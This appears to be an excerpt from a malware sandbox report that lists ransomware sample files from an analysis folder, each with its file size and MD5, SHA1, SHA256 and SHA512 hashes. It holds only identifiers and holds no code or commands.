SHA5128b7b9e1220a9bc62153b90912c2c7e0ceea72d7b99de2dac896eaab3a4573c4f5544b34768fb63a09e0e1b67c1e59e11ffaa57ed50467d3d67eb626fc6dc40ce
-
Filesize
729KB
MD536afc6cc568de8932c16882f110df2e4
SHA1f106ab92862b9105239cc8f20f78c036906626ee
SHA2569d82aa079a4a45b25cd5d78983ab333a09ff580eae353d0ad862a39cef434e73
SHA5127508df54e3bf33c1d008a78b3abac3adfc45c22c890bd1cd5adfd19bbfcc180f5b8c27a6c6fbf03f9befe35bb933e07e5ab571eefe9725b580f886774a287046
-
Filesize
797KB
MD5f94e76f3413533466d5381a1fcb5fdda
SHA142b1bf1036be4de18827d60a39e1894a7e28b334
SHA256b9cecac02570aecc4fec0f0266fa1fae40790bea5490f33a4b6486bce0cb0928
SHA5122dc46df45b4aea02158c6298127b9c36d1be9cdb6d43529f4300d090053cb82b916a2e426f959dcf73a941f1bc2ddc5d0471f41757329264611eb8e4cd5b15cf
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe
Filesize1.5MB
MD519a5f93ee7b52ad78f8381fcc69f3c73
SHA154a7e3fb3df432f3e724833376e379780d635377
SHA256392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b
SHA512f1120051bb26babd0c6e79f9de6cd0527924fd7504dadd912064a9cf73ecbfd5a29b0c352874ce3a449ccebd732ae3e3cc2dcb02ca8497512c27fd283209684f
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe
Filesize1.6MB
MD5788b041dd1a7d19ef988aca2f973b443
SHA1573d6a7db1aa743fd380dd9dada982dc06492e9f
SHA256957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b
SHA51294377df07829fe842dbdff1536e9e948668796b5a4d2680efb5106455a964aafebeb1521a515eded8ad6638db6b8062a2cdf3df8282205903550dab8475d7b23
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588.exe
Filesize55KB
MD57d1e3cf7c2e251f3c0ca35fcc977ebf9
SHA1124d921658ff63fee4aa54e1fc8d854d88af0adf
SHA256c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588
SHA512400ed34ff6639625aca5e8c218ac142751302072a26aa5005fcf48c231d13a032557fcb42154f4b6820f7b67e92217ecc1f7724640b77082fb36a5876c84f78a
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Gen.gen-7bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92.exe
Filesize559KB
MD54c37879689505f683c1e07b86b8aa7f2
SHA158484777d59af5378002ee6cd686525f26449098
SHA2567bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92
SHA5120b6615a38a67e922527edc694838afa2e96db58ab4f09c03fdf3e71a49bbab6e74addd54efbdd56a25c2bc8fc74e60d8a58409e2c471421438d3193df88acc74
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe
Filesize9.8MB
MD5df3dcd3bd2809219e2f4b9720e8b6569
SHA1e3dae915da6d6fd816b48ad141a52c710c049075
SHA2560001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d
SHA5129a43b1dd984237217bf34c3f7d8444e5b327621d498d5d90a1acfaff454f4003f28a88c90bf9da713d3ce8950f92113ccc5433e12bf725345e505f218d37be09
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706.exe
Filesize599KB
MD5431e1631af635f1d604578b8227b97b6
SHA1bf76446ff4a2a2b7cd17415666450e8d7c32f270
SHA256c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706
SHA5126dc328e12d85ed7f472de6cecf40a76bf76de247120a41af1d9ddf6e5d1728285e6de0a7938ed6d37306cc35b67b751a9c37cfcae644df214330b41fed21970f
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe
Filesize1.8MB
MD5efe669156891bf6c2eeeebcd1f41a0fb
SHA1c1c95933ee24c48d2a6b1383316c862c89428f1d
SHA256059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2
SHA512764eb24cb9801c0653351e203e18c5c219aea6463d48bd0d9067e376fe3cb8bbeab4b5b3ff5a150f3a0b0edef40880d8a97fd142615eeb48a61083bba5ef0ce7
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe
Filesize981KB
MD54668b18e555604b0eb8ba4fadc3650c1
SHA1197b29f404224c4cb61b953354155a97ea82eb66
SHA2560febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204
SHA51289212f920154caf9af1fa6874e37b8b9d23d405abf6c7d75e46e540937559f7e94fa8a066d757db644545377a6244d1f0389be81d9de56fc5c7890ea42bc6e8d
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe
Filesize3.9MB
MD5deebdc98c7394419d6493a4226b56c7d
SHA1ff261c48c2da2cdfc88f79e53ca08127846ba87f
SHA2566827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e
SHA5124f12f352c0c2e9831f29211cd5bbcad5f83401d6760344b6e4585d0ff6fc4043874c2bb5d224b6ef9a2ff10be57bf4058133904eb10775d47eae08b5eb0af55f
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe
Filesize9.7MB
MD5e6d6b64eb7749bf80e74ac50d6b0f736
SHA17a3b4e333c716dc7bedbf4c5313f3d354a690c3f
SHA256895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835
SHA51281bcaae3064aa9c7cb90b0a6432184df233bc9c284d9c9a4b5794e136e0ed8fcd9158fdaf9248d82a07dad5bc8deb49ef5f6990bffefb81bbcbe301511f1aa1e
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7.exe
Filesize4.5MB
MD5600d626de56a6ba586eb792896ececa3
SHA11c030d4869ce05967f3cdf62b5c10cb4581748dc
SHA256d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7
SHA51295b38e367bcfbc9b3c77a7e20bb44f4420fd627a2f3ceeae5348f08ad62e2677bff81290b24bbba6fbb3e305ca141a62b4469f922ccbb2cc7bb4d2b58f45c4e6
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe
Filesize436KB
MD525c592fe725b9fe527617ed7277f64de
SHA10bf0c6b716acf154dd776dd6cdd46d593588f503
SHA256d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94
SHA512fb575630683cb52935fe03ca9a642739a3dfc12b10f7d0f5c7b43c7d16d27c2ef613755e632c44a985b8faf1ba407f13996165d04e75522fda0d0e5e71ed5547
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-3c64050b054ba89ddd95db68e2ef6008f2540ba9d77810012374b67e1748381e.exe
Filesize406KB
MD53c4b72c99e01934a5521f930ccf36606
SHA17d39da1a5b25e66664701484716756668c6ba1f8
SHA2563c64050b054ba89ddd95db68e2ef6008f2540ba9d77810012374b67e1748381e
SHA5125504dff03ad2c0c0208871d7777022d424e27abc8150e8303a30e5a28bc1c808f370509d8b8499c3a174993ad24c6ce8005e14141a8e486f209930ce53836a57
-
C:\Users\Admin\Desktop\00459\Trojan-Ransom.Win32.Crypmodng.ie-b035f3b3676c6f401e6cda942f5d432c73e2ebe5520356d8193005bd577d4541.exe
Filesize5.6MB
MD536bf1e1df6c7702a77f0c41687c51acd
SHA1337550c9583182b5ee53b581156467e0b9640702
SHA256b035f3b3676c6f401e6cda942f5d432c73e2ebe5520356d8193005bd577d4541
SHA512ed02da02e68f65d9f7af6b31f2274cf97d5c4634500caa819ed17de9f52dcca5ee371344bdf3248d48b82f1afb0b16ed1dedaf84089f9fc6c09f211021d5b1a1
-
Filesize
43B
MD555310bb774fff38cca265dbc70ad6705
SHA1cb8d76e9fd38a0b253056e5f204dab5441fe932b
SHA2561fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d
SHA51240e5a5e8454ca3eaac36d732550e2c5d869a235e3bbc4d31c4afa038fe4e06f782fa0885e876ad8119be766477fdcc12c1d5d04d53cf6b324e366b5351fc7cd4
-
Filesize
1.1MB
MD53d0cb5c63389c2a2fd9045f1c5e60cd3
SHA1ba39efe0e292f0839975105245a8d2c7c3582d4d
SHA25613e9ea6c8563b6a57d5df6dadc1b884965c04cef18062b3bc88db9d8631d7af8
SHA512787a31ed25fc6404f9abc1b8e8deab01353d8d3d97f9caf19e161c0ce36a1fc2cbc61b176cabc8e5331ed87a2cb8460873ece96885fc0ecfa98d793bd8675672
-
Filesize
51KB
MD5321d79529997fa67899d4c4dad3144b3
SHA11eac1cf8efda41eba72ad2b172c770f5a6cc55a2
SHA256b1c6bf4b3202c562e110c880bd49c4018fcf6904e0c563d314ed49fe5dfe42d5
SHA5121baaa5b108485af2c72fc7d208253fe9bbd67ef9b077e0439677e172feaa78dbfd1cc596f25e7db1e0ed8e127a44c8d9ed7a8d037add6d6a762741dba0897e43
-
Filesize
148KB
MD5b3415cc6946a1d266627b68da7bcbbd1
SHA1f543f38119dcd2cfacb9de116e12b462761ba70e
SHA256541d3787ff101ec5dd5f7f3a025e0ebda4e4d7eb485d9420a6d912c02654c543
SHA5120e95a39f62ca4ec2cecf26c52a06c2883158af08f3456b8dd0a57989f36696c6bafb2229f6b466996ebd2103464f9072d754f8163d25a22ace0c74bdcacc681e
-
\??\c:\users\admin\desktop\00459\heur-trojan-ransom.win32.stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe
Filesize758KB
MD5770875a906b4931c20fc1abf90bd3728
SHA1ee3a2a7399459c55de025b9a20a1aef3e770cb83
SHA256187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db
SHA5124aad8881caa4d33bc018291d22d9cf7993f5eeade1e6fc7f19995e2dbfa4af4fe9e585a5a18d382fc07798a53c0aa3a8ca8e87b7443bf01548adee92266fd974